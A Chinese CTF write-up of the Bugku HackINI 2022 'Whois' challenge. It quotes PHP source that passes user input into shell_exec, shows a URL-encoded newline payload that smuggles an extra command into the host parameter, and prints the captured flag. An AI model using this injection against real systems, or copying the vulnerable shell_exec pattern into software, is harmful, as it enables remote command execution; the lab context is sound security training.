Bugku HackINI 2022 Whois 详解

目录

前置知识

解题过程

总结


前置知识

网络安全-绕过技巧(WAF、白名单、黑名单)总结-CSDN博客

解题过程

打开靶场

类似请求查询外网某个服务的一个界面,第一时间想到SSRF,后续抓包也看到了host和query的参数,但是尝试发现SSRF并不行

ctrl+U 查看源码可以发现 query.php,访问得到

复制代码
<?php

error_reporting(0);

$output = null;
$host_regex = "/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/";
$query_regex = "/^[0-9a-zA-Z\. ]+$/";


if (isset($_GET['query']) && isset($_GET['host']) && 
      is_string($_GET['query']) && is_string($_GET['host'])) {

  $query = $_GET['query'];
  $host = $_GET['host'];
  
  if ( !preg_match($host_regex, $host) || !preg_match($query_regex, $query) ) {
    $output = "Invalid query or whois host";
  } else {
    $output = shell_exec("/usr/bin/whois -h ${host} ${query}");
  }

} 

发现两个参数并没有进行什么过滤,只是确保两个参数是字符串等等,关键点在于

复制代码
$output = shell_exec("/usr/bin/whois -h ${host} ${query}");

很明显目标是利用shell_exec进行RCE

/usr/bin/whois明显是Linux系统,可以用换行符,达到执行两条命令的效果,

这里需要采用URL编码才能正常解析换行符,%0a

下面用ls看下当前目录下文件

复制代码
/query.php?host=whois.verisign-grs.com%0a&query=ls

可以看到有以下文件可疑

复制代码
thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

先尝试直接访问

成功获取flag

复制代码
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

总结

基础的Linux RCE 绕过

相关推荐
又来敲代码了1 分钟前
k8s的部署
linux·运维·云原生·容器·kubernetes
YaBingSec6 分钟前
玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP
大数据·数据库·hadoop·redis·笔记·分布式·web安全
IT WorryFree26 分钟前
FGT-KVM 完整部署极简教程(CentOS 7 + KVM 环境)
linux·运维·centos
Chengbei1130 分钟前
面向红队的 AI 赋能全场景流量分析仪 网页 / APP / 终端 / IoT 全域 HTTPS 抓包解密利器
人工智能·物联网·网络协议·web安全·网络安全·https·系统安全
一袋米扛几楼9830 分钟前
【报错问题】彻底解决 TypeScript 报错 TS2769: No overload matches this call (JWT 篇)
linux·javascript·typescript
goyeer33 分钟前
【ITIL4】32服务实践 - 服务变更管理
linux·运维·服务器·数字化·价值·itil
扛枪的书生38 分钟前
Git 学习总结
linux
liuyao_xianhui41 分钟前
进程概念与进程状态_Linux
linux·运维·服务器·数据结构·c++·哈希算法·宽度优先
wang09071 小时前
Linux性能优化之磁盘基础介绍
linux·运维·性能优化
HalvmånEver1 小时前
MySQL的内置函数
linux·数据库·学习·mysql